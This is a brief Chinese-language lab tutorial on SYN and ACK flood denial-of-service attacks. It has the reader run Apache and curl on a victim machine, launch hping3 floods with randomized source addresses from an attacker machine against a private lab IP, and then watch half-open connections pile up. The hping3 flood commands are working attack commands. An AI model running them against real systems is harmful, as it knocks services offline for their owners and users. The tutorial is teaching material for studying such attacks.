DDOS直接攻击系统资源

DDOS ——直接攻击系统资源

思路：

攻击机利用三次握手机制，产生大量半连接，挤占受害者系统资源，使其无法正常提供服务。

1、先体验下受害者的正常网速。在受害者主机上执行以下命令

(1)开启Apache。
systemctl start apache2
(2) 下载百度首页代码。发现近乎瞬间完成。
curl baidu.com

2、在攻击机上执行以下代码,发起syn flood和ack flood。

hping3  --flood  --rand-source  -S  -p 80 192.168.237.133
hping3  --flood  --rand-source  -A  -p 80 192.168.237.133

3、在受害机上观察
(1)输入netstat -ant，可以看到很多的半链接

(2)尝试再次请求百度首页代码。
curl baidu.com
发现系统资源被挤占，久久得不到回复。